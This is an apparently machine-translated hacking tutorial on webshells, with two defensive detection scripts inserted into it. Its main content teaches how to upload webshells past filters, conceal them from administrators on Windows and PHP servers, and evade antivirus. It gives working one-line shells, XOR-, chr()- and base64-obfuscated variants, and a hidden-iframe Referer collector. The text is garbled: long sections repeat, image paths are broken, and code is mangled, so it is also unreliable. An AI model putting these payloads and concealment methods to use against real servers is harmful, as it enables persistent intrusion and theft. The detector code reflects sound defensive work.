In the backend management system of some enterprises, there is a function to back up the database (for example, Southern CMS has the function to back up the database). You can upload a picture that contains a Trojan sentence, or change it to jpg format, and then use the database backup function to back up the picture to asp and other content that can be parsed into script statement format, and then passed Trojans can be executed by accessing the web, but this method is very old. Now most cms have canceled or disabled this backup function. 4. Use database statements to upload
(1) mysql database into outfile
The premise of this method must be that the website has a corresponding injection point, and the current user must have upload permission, and there must be a current web page in The absolute path under the server. The method is to use joint query to import the one-sentence Trojan into a PHP file under the website, and then use the server to connect to the website. However, the conditions for the above method are too harsh and are rarely encountered. (2) Create a new table writing Trojan Some open source cms or self-made webshells will have database management functions. There are sql query functions in the database management functions. First use create table shell (codetext); create a name called shell The table contains a list called code and the type is text. Then use insert into shell(code) values('one sentence horse'). Here, the code column in the shell table is assigned the value of one sentence horse, and then through custom backup, back up the table as x.php;x and then It is parsed into php and then executed. This is not x.php; x must be parsed into php. Different web servers have different service programs and different filtering rules. Other methods may be used. (3)phpMyadmin setting errorphpMyadmin is a tool used to manage website databases, in which config.inc.php is its configuration file. When viewing the file, if $cfg['Servers'][$i ]['auth_type'] The value setting of the parameter is not set (the default is config), which means that no corresponding verification is done when logging in to the database. You can directly connect to the database, and in some versions of Mysql, the default login is as the root user. Log in (i.e. administrator), so logging in has the maximum authority. However, root can generally only log in locally, so a remote login user must be created. After logging in as a remote login user, create a table and then write the one-sentence Trojan into it. 3. The "security" of webshell
1. Regarding the hiding of webshell
When uploading webshell, you must hide the webshell. The first purpose of hiding the webshell is to prevent the website administrator from discovering it and deleting it. The second purpose is to prevent other hackers from discovering this file and using it. (1) Malaysia’s hidden
①Undead zombies
Windows system has system reserved folder names. Windows does not allow these names to be used to name folders. Reserved folders: aux|prn|con|nul|com1|com2 |com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. But these can be created using the windows copy command, such as:
Default
1
c:>copy3.asp.C:aux.asp
file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image020.png
file:///C:UsersSAKAIY~1 AppDataLocalTempmsohtmlclip11clip_image022.jpgcreated in c drive an aux.asp. This file cannot be deleted in the graphical interface. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image023.pngTo delete, you must use the del command. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image024.pngThere is no prompt after deletion, but the file is indeed gone. Of course, although this method can be used to create a webshell that cannot be deleted through the graphical interface, if it is placed directly in the root directory of the web page, it will still be deleted if an experienced network administrator sees it. ②clsid hidden
Every program in windows has a clsid. If you name a folder x.{program clsid}, then enter two commands: file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image026. jpgAfter creationfile:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image027.png
click to enter the control panel, but in fact the file is still a folder, and Malaysia still exists in it, and create a Naming such a folder with a clsid as a corresponding program can confuse network administrators. For example, enter the recycle bin folder to create such a folder with a recycle bin clsid, and copy a reserved word in it. asp, you can also use
Default
1
attrib+ h+s+r+d/s/d
Modify the properties of the file and hide it. Generally, Windows does not display hidden files by default, and the recycle bin folder is automatically created, so that an immortal webshell can be hidden in the server.
③Drive hiding technology
The principle is that in the Windows file system, when a folder is opened, the system will send an IRP_MJ_DIRECTORY_CONTROL function. This function can allocate a buffer to traverse the subfolders under the folder. The obtained information is stored in the buffer. When traversing, it looks for matching file names. If the file names match, the current folder or file is bypassed. Regarding the principle of bypass, I queried the code. According to my understanding, It adds the offset of the file based on the traversed pointer when querying the target file, and skips directly without scanning the target folder. For the implementation of this technology, although there are many C source codes on the Internet, it is difficult to operate because of the support of header files and system support (the file systems of different systems will be different). I found Easy on the Internet The File Locker program needs to be installed on the web server and set permissions on the target file.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
Permission settings include readable, writable, deletable, and visible.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg
You can see from the above picture that we have hidden it. As mentioned above, because the traversal is directly bypassed, the absolute path can be accessed. My understanding is:
Default
WINDOWS
xlkfs
.dat
c:
WINDOWS
xlkfs.dllc:WIND OWS
xlkfs.ini c:WINDOWS
system32driversxlkfs.sys
These 4 files replace traversal Query, to access hidden files, entering the absolute path does not apply absolute path query, but queries through the above four files, which is equivalent to making a separate driver for hidden files.
In order not to be discovered by the administrator, you can delete the Easy File Locker program, but you cannot delete the above four files. After the program is deleted, the hidden file can still be accessed by entering its absolute path, which achieves the goal of hiding the backdoor.
④ Registry hiding
Registry path: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL. There is a CheckedValue value under this key; change it to 0. If there is no CheckedValue, create it directly and assign it the value 0. Files created as hidden will then be completely hidden: even if "Show all files" is turned on in the folder options, they will not be displayed.
(2) Hiding of one-sentence Trojans
① Header file inclusion hiding
Some script files on the web contain include statements. You can use this inclusion mechanism to include the one-sentence file: when the page is accessed, the included statement is executed directly. The asp include statement is `<!--#include file="path"-->`; fill in the path directly, where the path is the path on the web server.
You can use the Webmaster Stop tool to write the one-sentence NTFS-stream pony into an image. After writing it, replace the '\' in the path with ':' (the NTFS stream separator); the image itself will not display anything. Then find an asp file on the web server and write the include statement at the beginning of that file. The php include statement:
```php
<?php include($include); ?>
```
Here $include can be an external path, for example:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php
The content of 1.php on aaa is
```php
<?php include($include); ?>
```
which performs the inclusion. bbb is an external server, with the precondition that it must not execute PHP; otherwise hehe.php (the one-sentence horse) would run on the bbb server instead of on aaa.
② Configuration file hiding of the one-sentence (PHP)
After getting the PHP webshell, you can use php.ini to hide the file by editing the configuration. One of its functions is to prepend the contents of a given file to every page as a header (or append it as a footer): auto_prepend_file = hehe.php. Then look at include_path = "E:\PHPnow-1.5.6\htdocs;." This setting gives the locations from which the header and footer files are loaded; the rule for the path is "path1;path2", meaning the header/footer file is looked up in the folder path1 and then in path2. Because the last entry here is '.', which denotes the current (root) directory, the prepended file is effectively added to the homepage. So write the one-sentence into hehe.php, and through php's prepend function the one-sentence is written into the homepage of the website.
③ 404 pony
A 404 pony displays a "page does not exist" 404 page when accessed, while in fact the Trojan code has already been executed. Generally it can be called up by pressing Shift 5 times.
4. Avoiding detection ("anti-kill") of one-sentence webshells
1. Construction method to bypass detection (PHP)
General detection programs filter strings such as "_POST", "system" and "call_user_func_array". Sometimes a construction method can bypass such detection programs. The basic principle is that each character in PHP corresponds to a binary value, so XOR can be used to replace a character in the horse with the XOR of two other characters. For example:
```php
<?php
@$_++;            // ++ on the undefined $_ turns it into 1
$__=("#"^"|");    // "_"
$__=("."^"~");    // "P"
$__=("/"^"`");    // "O"
$__=("|"^"/");    // "S"
$__=("{"^"/");    // "T"
?>
```
Then the construction can be combined into a one-sentence:
```php
<?php
@$_++;
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); // the value of $__ is _POST
@${$__}[!$_](${$__}[$_]);
?>
```
The result is @$_POST[0]($_POST[1]): !$_ is the negation of 1, and since 1 is true in the language its negation is 0 (false). But this bypass is quite weak. Think about it carefully: even though each character is replaced by the XOR of two characters, the expression ("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/") is itself a fixed byte sequence, so its hexadecimal value can simply be added as a second signature and the horse is still detected.
2. Regular expression replacement method (PHP)
PHP has a function preg_replace() that performs regular-expression replacement. Using replacement to bypass detection relies on a feature of the PHP scripting language: when the function is called with the e modifier, the replacement string is evaluated as code, so if the value passed into the function's parameter contains a command, the command is executed.
```php
<?php
function funfunc($str){
}
echo preg_replace("/<title>(.+?)<\/title>/ies", 'funfunc("\1")', $_POST["cmd"]);
?>
```
The code above is a replacement process. First an empty function is created, and then preg_replace replaces whatever sits between the <title> tags (the HTML title) in the cmd form field with a funfunc call. The value posted in the form is written as
```html
<title>{${phpinfo()}}</title>
```
(of course phpinfo() here can be replaced with other commands). Through the replacement it becomes funfunc("{${phpinfo()}}"); because the e modifier evaluates the replacement as PHP and ${} causes the content inside {} to be parsed and executed, the phpinfo() here runs without trouble.
3. Instant generation method (PHP)
When using header-file inclusion, the included php header file is easily found by a scanner. In that case you can use file_put_contents to create a php file with the one-sentence written into it, generating the horse just before accessing it; but this function is itself sensitive and easily detected.
4. Avoidance method (asp)
Because some asp servers filter in order to block one-sentence horses, you can use:
```asp
<script language=VBScript runat=server>execute request("cmd")</script>
```
The function is the same; only the form changes. Avoiding a specific scripting language: an aspx one-sentence
```aspx
<script language="C#" runat="server">WebAdmin2Y.x.y aaaaa=new WebAdmin2Y.x.y("add6bb58e139be10");</script>
```
Here the one-sentence horse is written in C#.
5. Split method (asp)
Split the statement into pieces. Although the chance of bypassing is small, it is still a bypass technique: some servers implement many sophisticated scanning methods yet miss small things. There is also an enhanced version of the split method:
```asp
<%If Request("MH")<>"" Then Execute(Request("MH"))%>
<%if request("MH")<>"" then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>
```
The two lines above use an if statement to separate the pieces. The central idea is to split up the sensitive characters: the usual asp signature is eval(request or execute(request, and once split the signature is no longer detected, so it is bypassed.
6. Garbled transformation (ANSI->Unicode encoding)
```asp
<%eval request("#")%>
```
is transformed into “┼攠數畣整爠煥敵瑳∨∣┩愾”
```asp
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("brute"))%>
```
The line above uses ASCII encoding: chr(114) stands for the character whose ASCII code is 114, namely r. After conversion the code reads
```asp
<%eval(eval("request")("brute"))%>
```
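Every trick in sections 1, 2, 5 and 6 (and the gzinflate/base64/str_rot13 stacking described under 7 below) leaves the decoded script unchanged, so a scanner that normalises before matching sees through them. The following is an added example, not code from the article: a small static normaliser whose SIGNATURES list and SAMPLES are constructed for the demo and are not a complete rule set.

```python
"""Added example, not from the original article: a static normaliser that undoes
the obfuscations of sections 1, 2, 5 and 6 above (and the gzinflate/base64/
str_rot13 stacking of section 7 below) so signatures are matched on the decoded
script rather than the raw bytes.  SIGNATURES and SAMPLES are constructed."""
import base64
import codecs
import re
import zlib

# Strings the article says scanners key on; matched after lower-casing and whitespace removal.
SIGNATURES = ("eval(request", "evalrequest(", "execute(request", "executerequest(",
              "$_post", "$_get", "preg_replace", "phpinfo(", "gzinflate", "eval(")

XOR_PAIR = re.compile(r'\(\s*"(.)"\s*\^\s*"(.)"\s*\)')             # ("#"^"|")
XOR_CHAIN = re.compile(r'(?:\(\s*"."\s*\^\s*"."\s*\)\s*\.?\s*)+')  # pairs joined by "."
ASSIGN = re.compile(r'(\$\w+)\s*=\s*([A-Za-z_]\w*)\s*;')           # $__=_POST; (after folding)
CHR_CALL = re.compile(r'chr\((\d+)\)', re.I)
CHR_CHAIN = re.compile(r'(?:chr\(\d+\)(?:\s*[+&]\s*(?=chr\())?)+', re.I)
GZ_B64 = re.compile(r"gzinflate\(\s*base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)", re.I)
LITERAL_CALL = re.compile(r"(str_rot13|strrev|base64_decode)\(\s*'([^']*)'\s*\)", re.I)


def fold_xor(src):
    """PHP ("#"^"|").("."^"~")... -> the literal text the XORs evaluate to."""
    def fold(m):
        return "".join(chr(ord(a) ^ ord(b)) for a, b in XOR_PAIR.findall(m.group(0)))
    return XOR_CHAIN.sub(fold, src)

def resolve_varvars(src):
    """After folding, '$__=_POST;' lets the variable-variable ${$__} become $_POST."""
    for var, word in ASSIGN.findall(src):
        src = src.replace("${" + var + "}", "$" + word)
    return src

def fold_chr(src):
    """ASP chr(114)+chr(101)+... -> the word it spells, as eval() would see it."""
    return CHR_CHAIN.sub(
        lambda m: "".join(chr(int(n)) for n in CHR_CALL.findall(m.group(0))), src)

def _quote(text):
    return "'" + text.replace("'", "\\'") + "'"

def peel_layers(src, max_rounds=10):
    """Replace f('literal') by its result, innermost call first, until stable.
    gzinflate(base64_decode('..')) is one step because the middle is binary."""
    def inflate(m):
        try:  # PHP gzinflate() is raw DEFLATE, hence wbits=-15
            return _quote(zlib.decompress(base64.b64decode(m.group(1)), -15).decode())
        except (ValueError, zlib.error):
            return m.group(0)
    def literal(m):
        func, text = m.group(1).lower(), m.group(2)
        try:
            if func == "str_rot13":
                return _quote(codecs.encode(text, "rot_13"))
            if func == "strrev":
                return _quote(text[::-1])
            out = base64.b64decode(text, validate=True).decode()
            return _quote(out) if out.isprintable() else m.group(0)
        except ValueError:  # bad base64 or undecodable bytes: leave it alone
            return m.group(0)
    for _ in range(max_rounds):
        new = LITERAL_CALL.sub(literal, GZ_B64.sub(inflate, src))
        if new == src:
            break
        src = new
    return src

def normalise(src):
    src = fold_chr(resolve_varvars(fold_xor(peel_layers(src))))
    return re.sub(r"\s+", "", src).lower()

def scan(src):
    """Return the signatures present in the normalised form of src."""
    norm = normalise(src)
    return [s for s in SIGNATURES if s in norm]

def layered_sample():
    """Constructed gzinflate(base64_decode()) wrapper around an inert payload."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = comp.compress(b"phpinfo();") + comp.flush()
    return "<?php eval(gzinflate(base64_decode('%s'))); ?>" % base64.b64encode(blob).decode()

SAMPLES = {  # constructed, in the shapes the article shows
    "xor_chain": '<?php @$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");'
                 '@${$__}[!$_](${$__}[$_]); ?>',
    "asp_chr": '<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)'
               '+chr(116))("brute"))%>',
    "rot13_names": "<?php $f=strrev(str_rot13('rgnysavmt')); ?>",
    "layered": layered_sample(),
    "benign": "<?php echo 'hello'; ?>",
}

if __name__ == "__main__":
    for name, code in SAMPLES.items():
        print(f"{name:12s} -> {scan(code)}")
```

The split variant of section 5 still escapes this normaliser, because resolving session("MH") = request("MH") needs data-flow tracking rather than string folding.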
7. Anti-detection of the Da Ma (big horse)
(1) base64 encoding
Anti-detection for the Da Ma can be done by compressing the Da Ma code, base64-encoding the compressed result, and then appending
```php
@eval(gzinflate(base64_decode($code)));
```
to execute the script. Here the $code variable holds the base64 string; on execution it is first decompressed with gzinflate and then executed by eval. In fact this does not truly evade detection: base64_decode and eval are still on the signature list, so it will still be flagged when it passes through a scanner.
(2) ROT13 encoding (php)
str_rot13 is a php function for encoding; it can be used to encode script code to bypass signature detection, for example (the screenshot is not preserved here). In that example the strrev function reverses characters, and to escape signature detection the characters are deliberately separated with '.' signs. The three strings encoded with str_rot13 in the example are gzinflate, str_rot13 and base64_decode in that order, which amounts to triple encoding and also avoids the two signatures gzinflate and base64_decode. But str_rot13 itself is not avoided, and it is possible that some anti-virus software also uses str_rot13 as a signature. ROT13 means "rotate by 13": each letter is replaced by the letter 13 positions away in the alphabet, so applying it twice returns the original. However, because the algorithm is fixed, the encryption strength is weak, and cracking it is trivial: just apply it once more.
(3) Other encodings
Generally, anti-virus software and scanners use signatures to decide whether something is malicious. When doing anti-detection work on a Da Ma, a small horse or a one-sentence, php or asp encoding functions (base64, rot13 and so on) are usually used to bypass scanners. But I think you can write your own encryption algorithm and use it to encrypt the script code to bypass the signatures. You can borrow ideas from the Caesar cipher and shift ciphers, write an encryption algorithm and encrypt the script code; signatures such as base64 and rot13 then disappear. Or, without much trouble, you can use the homemade algorithm to encrypt only the signature strings and decrypt them when used. You can also use keyed algorithms such as DES and RSA. Generally a Da Ma has a password login box; you can tie the login password to the decryption key so that the script can only be decoded after the correct password is entered. On the one hand this avoids detection by scanners and anti-virus software, and on the other hand it is convenient: even if someone else obtains this Da Ma, they cannot decrypt it and read the source code.
5. About webshell backdoors
Generally, Da Ma downloaded from the Internet have more or less backdoors. These backdoors lead directly to the website we obtained being taken over by someone else, so a Da Ma downloaded from the Internet must first be checked for backdoors. For example, the universal password here:
```asp
end function
if session("hehe")<>"" then
if request.form("pass")=userpass or request.form("pass")="1111111" then session("hehe")=UserPass
response.redirect url
else
```
Here
```asp
request.form("pass")=userpass
```
was originally used to verify the value of pass: if the entered pass equals userpass, verification succeeds. But the later
```asp
or request.form("pass")="1111111"
```
means that if the entered pass is 1111111 you can also log in to the Da Ma. Of course, it is not always that simple. The original author can also give userpass a second value and add a trigger condition that changes userpass when he logs in (for example, a failed login triggers an update of the userpass value), so that a suffix is appended; moreover the trigger code and the verification code are far apart and hard to find. In that case we have to analyse the Da Ma code line by line.
Then use a frame to mount the horse:
```html
<iframe src="backdoor address" width=0 height=0></iframe>
```
Here the width and height of the linked address are set to 0, so the frame is hidden. The "backdoor address" points to your own script receiver, and finally you put the receiving script on a public-network server you built. The receiving script is as follows:
```asp
<%
url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("hehe.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>
```
where
```asp
url=Request.ServerVariables("HTTP_Referer")
```
reads the Referer of the request, that is, the URL address of the Da Ma, and the URL is then saved to hehe.txt in the current directory.
To remove this kind of backdoor, you must first disable the second password check in the Da Ma, i.e. the master password: delete the relevant function code, and then check whether the ASP Da Ma page contains a hidden URL such as width=0 height=0; find it and delete it.
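Both backdoor patterns in this section, the hard-coded second password and the zero-size iframe that leaks the shell's URL through the Referer, can be found mechanically before a downloaded script is ever deployed. The following is an added example (not code from the article); the ASP snippets are constructed to mirror the ones above, and the regexes are review heuristics, not a complete audit.

```python
"""Added example, not from the original article: a quick source review for the
two backdoor patterns described in section 5, a second, hard-coded password
OR-ed into the login check and a zero-size iframe that leaks the shell's URL
to a third party.  SAMPLE and CLEAN are constructed; the regexes are heuristics."""
import re

# request.form("pass") compared with a string literal instead of a variable.
LITERAL_PASS = re.compile(r'request\.form\s*\(\s*"pass"\s*\)\s*=\s*"([^"]*)"', re.I)
# <iframe ...> whose width and height are both 0, in either order.
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
ZERO = re.compile(r'\b(width|height)\s*=\s*["\']?0\b', re.I)
SRC = re.compile(r'src\s*=\s*["\']?([^"\'\s>]+)', re.I)
# Referer logging, the receiver side of the same backdoor.
REFERER_LOG = re.compile(r'ServerVariables\s*\(\s*"HTTP_REFERER"\s*\)', re.I)


def hardcoded_passwords(src):
    """Return the string literals that request.form("pass") is compared with."""
    return LITERAL_PASS.findall(src)


def hidden_iframes(src):
    """Return the src of every iframe whose width and height are both 0."""
    hits = []
    for tag in IFRAME.findall(src):
        dims = {d.lower() for d in ZERO.findall(tag)}
        if dims == {"width", "height"}:
            m = SRC.search(tag)
            hits.append(m.group(1) if m else "")
    return hits


def review(src):
    """Collect findings for one script as (kind, detail) pairs."""
    findings = [("hard-coded password", p) for p in hardcoded_passwords(src)]
    findings += [("hidden iframe", s) for s in hidden_iframes(src)]
    if REFERER_LOG.search(src):
        findings.append(("referer collector", "writes HTTP_REFERER to disk"))
    return findings


# Constructed sample in the shape the article describes.
SAMPLE = '''
if session("hehe")<>"" then
if request.form("pass")=userpass or request.form("pass")="1111111" then session("hehe")=UserPass
response.redirect url
else
<iframe src=http://collector.example/r.asp width=0 height=0></iframe>
'''
# Constructed clean counterpart: variable comparison only, visible iframe.
CLEAN = '''
if request.form("pass")=userpass then session("hehe")=UserPass
<iframe src=http://example.com/banner width=300 height=60></iframe>
'''

if __name__ == "__main__":
    for kind, detail in review(SAMPLE):
        print(f"{kind:20s} {detail}")
```

A literal password that the scan reports is not always the whole story: as the article notes, the author may instead mutate userpass on a login trigger far from the check, so a clean report here still calls for a line-by-line read.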
The above has introduced the implementation and hidden exploration of Webshell, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
When the web server turns on fast-CGI, upload the image xx.jpg. The content is:
Default
1
|
fputs(fopen('shell.php', 'w' ),'eval($_POST[shell])?>');?> |
The fput used here creates a shell.php file and writes a sentence. Accessing the path xx.jpg/.php will generate a one-sentence Trojan shell.php in this path. This vulnerability exists in IIS 7.0/7.5 and Nginx versions below 8.03. Locale: PHP, prel, Bourne Shell, C and other languages.
(5) Apache parsing vulnerabilityThe way Apache parses is from right to left. If the parsing cannot be successful, it will want to move one to the left. However, background upload usually looks at the rightmost suffix of the uploaded file, so according to For this, you can name the horse xx.php.rar, because apache cannot parse rar, so it parses it as php, but the background upload point parses it as rar, thus bypassing the upload file suffix restriction 2. Truncate the upload
When uploading a picture, for example, name it 1.asp .jpg (there is a space after asp). When uploading, use NC or burpsuite to capture the form, and add %00 after the upload name asp (in burpsuite You can directly edit the HEX value in it. The HEX value of a space is 20. Change 20 to 00). If HEX is 00, it means truncation, and 20 means a space. If it means truncation, it means ignoring the JPG verification statement in the script and directly Upload ASP. 3. Backend database backup
In the backend management system of some enterprises, there is a function to back up the database (for example, Southern CMS has the function to back up the database). You can upload a picture that contains a Trojan sentence, or change it to jpg format, and then use the database backup function to back up the picture to asp and other content that can be parsed into script statement format, and then passed Trojans can be executed by accessing the web, but this method is very old. Now most cms have canceled or disabled this backup function. 4. Use database statements to upload
(1) mysql database into outfile
The premise of this method must be that the website has a corresponding injection point, and the current user must have upload permission, and there must be a current web page in The absolute path under the server. The method is to use joint query to import the one-sentence Trojan into a PHP file under the website, and then use the server to connect to the website. However, the conditions for the above method are too harsh and are rarely encountered. (2) Create a new table writing Trojan Some open source cms or self-made webshells will have database management functions. There are sql query functions in the database management functions. First use create table shell (codetext); create a name called shell The table contains a list called code and the type is text. Then use insert into shell(code) values('one sentence horse'). Here, the code column in the shell table is assigned the value of one sentence horse, and then through custom backup, back up the table as x.php;x and then It is parsed into php and then executed. This is not x.php; x must be parsed into php. Different web servers have different service programs and different filtering rules. Other methods may be used. (3)phpMyadmin setting errorphpMyadmin is a tool used to manage website databases, in which config.inc.php is its configuration file. When viewing the file, if $cfg['Servers'][$i ]['auth_type'] The value setting of the parameter is not set (the default is config), which means that no corresponding verification is done when logging in to the database. You can directly connect to the database, and in some versions of Mysql, the default login is as the root user. Log in (i.e. administrator), so logging in has the maximum authority. However, root can generally only log in locally, so a remote login user must be created. After logging in as a remote login user, create a table and then write the one-sentence Trojan into it. 3. The "security" of webshell
1. Regarding the hiding of webshell
When uploading webshell, you must hide the webshell. The first purpose of hiding the webshell is to prevent the website administrator from discovering it and deleting it. The second purpose is to prevent other hackers from discovering this file and using it. (1) Malaysia’s hidden
①Undead zombies
Windows system has system reserved folder names. Windows does not allow these names to be used to name folders. Reserved folders: aux|prn|con|nul|com1|com2 |com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt. But these can be created using the windows copy command, such as:
Default
1
c:>copy3.asp.C:aux.asp
file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image020.png
file:///C:UsersSAKAIY~1 AppDataLocalTempmsohtmlclip11clip_image022.jpgcreated in c drive an aux.asp. This file cannot be deleted in the graphical interface. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image023.pngTo delete, you must use the del command. file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image024.pngThere is no prompt after deletion, but the file is indeed gone. Of course, although this method can be used to create a webshell that cannot be deleted through the graphical interface, if it is placed directly in the root directory of the web page, it will still be deleted if an experienced network administrator sees it. ②clsid hidden
Every program in windows has a clsid. If you name a folder x.{program clsid}, then enter two commands: file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image026. jpgAfter creationfile:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image027.png
click to enter the control panel, but in fact the file is still a folder, and Malaysia still exists in it, and create a Naming such a folder with a clsid as a corresponding program can confuse network administrators. For example, enter the recycle bin folder to create such a folder with a recycle bin clsid, and copy a reserved word in it. asp, you can also use
Default
1
attrib+ h+s+r+d/s/d
Modify the properties of the file and hide it. Generally, Windows does not display hidden files by default, and the recycle bin folder is automatically created, so that an immortal webshell can be hidden in the server.
③Drive hiding technology
The principle is that in the Windows file system, when a folder is opened, the system will send an IRP_MJ_DIRECTORY_CONTROL function. This function can allocate a buffer to traverse the subfolders under the folder. The obtained information is stored in the buffer. When traversing, it looks for matching file names. If the file names match, the current folder or file is bypassed. Regarding the principle of bypass, I queried the code. According to my understanding, It adds the offset of the file based on the traversed pointer when querying the target file, and skips directly without scanning the target folder. For the implementation of this technology, although there are many C source codes on the Internet, it is difficult to operate because of the support of header files and system support (the file systems of different systems will be different). I found Easy on the Internet The File Locker program needs to be installed on the web server and set permissions on the target file.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
Permission settings include readable, writable, deletable, and visible.
Default
1
file:///C: UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg
You can see from the above picture that we have hidden it. As mentioned above, because the traversal is directly bypassed, the absolute path can be accessed. My understanding is:
Default
WINDOWS
xlkfs
.dat
c:
WINDOWS
xlkfs.dllc:WIND OWS
xlkfs.ini c:WINDOWS
system32driversxlkfs.sys
These 4 files replace traversal Query, to access hidden files, entering the absolute path does not apply absolute path query, but queries through the above four files, which is equivalent to making a separate driver for hidden files.
In order not to be discovered by the administrator, you can delete the Easy FileLocker program, but you cannot delete the above 4 files. After deleting the program, you can still access it by entering the absolute path, which achieves the function of hiding the backdoor④Registry hidingRegistry path: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorer\AdvancedFolderHiddenSHOWALLThere is a CheckedValue key under this path, put it Change it to 0. If there is no CheckValue key, create one directly and assign it a value of 0. Then the created hidden files will be completely hidden. Even if "Show all files" is turned on under the folder options, it will not be displayed. (2) Hiding of one-sentence Trojans①Header file inclusion hiding
In some script files in the web, some files have include statements. You can use this inclusion method to include one-sentence files. When accessing this page These sentences will be called directly. asp includes the statement: , fill in the path directly, and the file path is the path on the web server.
You can use Webmaster Stop to write a sentence of NTFS stream pony into the image. After writing the ‘’ to ‘:’ in the path, the image will not be displayed, and then find
Go to an asp file on the web server and write an include statement at the beginning of the file, php include statement:
Default
1
include($include
);?>
$include here can be an external path such as:
http://www.aaa.com/1.php?Include=http://www.bbb.com/hehe.php
This aaa The content of 1.php on is
Default
1
include($include);?>
means inclusion. bbb is an external server, provided that this server cannot support PHP. Otherwise, hehe.php (that is, one sentence horse) will be executed on the bbb server, but aaa will not be executed.
②Configuration file hidden sentence (PHP)
After getting the PHP webshell, you can use php.ini to hide files and edit configuration files. One of the functions is to add the contents of a certain file to any interface. Header and footer: auto_prepend_file =hehe.phpThen look at include_path = “E:PHPnow-1.5.6htdocs;”This configuration information indicates the location of the collection where the header and footer are loaded, path The rule is "path1;path2", which means adding the header and footer files in the folder of path1 to the files in path, because here is a '.' indicating the root path, which is equivalent to adding it to the homepage. Go there, and then write a sentence in the hehe.asp file, you can add the header function through php and write the sentence into the homepage of the website. ③404 Pony
404 Pony displays a 404 page that does not exist when accessing, but in fact the Trojan code has been executed. Generally, it can be called out by pressing shift 5 times. 4. One sentence about webshell to avoid killing
1. Construction method to bypass detection (PHP)
General detection programs will filter characters like "_POST", "system", "call_user_func_array", this Sometimes you can use construction methods to bypass some detection programs. The basic principle is that each character in PHP corresponds to a binary value. You can use the XOR method to make one character in the horse use the XOR value of two characters. to replace. For example, like the code
Default
@ +$ _ ++
; // Here ++ let '_' 自 1 $ __ = ( "#" ^ "|"
) ;
$__=("/"^"`");
$__= ("|"^"/"); "{"^"/" );
Then the structure and a sentence can be written as
Default
@$_
++;
$__=
("#"^
"|").("." ^"~").("/"^"`"
).("|"^"/").("{"^ "/"); // The value of $__ is _POST @${$__}[!$_](${$__}[$_]); ?> ;
//The result is @$_POST[0]($POST[ 1])!$_ represents the opposite of 1. In the language, 1 represents true, and the converse is 0 (false)But this bypass method is quite weak. If you think about it carefully, even if it is two characters Binary values are "~").("/"^"`").("|"^"/").("{"^"/")1 $__=(
"#"^ "|" ).
("."^"~")
.
("/"^"`" ).("|"^"/"
).("{"^"/"
)
The binary value of
will be detected twice. The value of the hexadecimal code will still be Kill. 2. Regular expression replacement method (PHP) There is a function preg_replace() in php, which can realize the replacement of regular expressions. Using substitution to bypass the detection system also requires a function feature in the PHP scripting language. When the function is called, if the value assigned to the formal parameter in the function contains a command, the command will be executed. Default(.+?)/ies",'funfunc("1")', $_POST["cmd"]);
?>1234
function funfunc
($str){
}
echopreg_replace("/
(.+?) /ies",'funfunc("1")',$_POST
["cmd"
]);
?>
The above code is a process of replacement. First, create an empty function, and then use the preg_replace function to replace the (here is the theme in html) in the form cmd with funfunc. The value in the post form is written as
{${phpinfo()}}
(of course the phpinfo() here can be replaced with other commands), through replacement, it will become Into funfunc({${phpinfo()}})Since ${} can parse the content in {}, the phpinfo here can be executed smoothly. 3. Instant generation method (PHP)
When using header file inclusion, the included header file php is easily scanned by the scanner. At this time, you can use file_put_content to create a file with a sentence like php written in it. . Generate the horse before accessing it, but this function is sensitive and can be easily killed. 4. Avoidance method (asp)
Because some asp servers will filter in order to prevent one-line spam, you can use:
Default
1
scriptlanguage=VBScriptrunat =server> execute request("cmd")/Script>
The functions are the same, Just change the form. Avoid specific script language: aspx one sentence
Default
1
<script>language<span>=<span>"C#"<span><span>runat <span>=<span>"server"<span>><span> WebAdmin2Y<span>.<span>x<span>.<span>y<span><span>aaaaa<span><span>=<span><span>new<span><span>WebAdmin2Y<span>.<span>x<span>.<span>y<span>(<span>"add6bb58e139be10"<span>)<span>; <span></script>
这里使用C#语言写一句话马。5.拆分法(asp)
将拆分为,虽然绕过的可能性很小,但是也是一种绕过手法,也许有的服务器,做了很多高大上的扫描方式,但是遗漏小的问题。还有拆分法加强版:
Default
12
IfRequest("MH")""ThenExecute(Request("MH"))%>
